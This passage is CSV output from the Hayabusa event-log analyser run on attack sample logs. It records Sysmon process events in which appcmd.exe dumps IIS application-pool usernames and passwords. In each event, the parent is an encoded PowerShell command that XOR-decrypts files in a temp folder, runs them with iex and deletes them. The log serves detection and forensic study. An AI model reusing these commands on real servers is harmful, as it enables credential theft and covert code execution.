GMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.891 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUA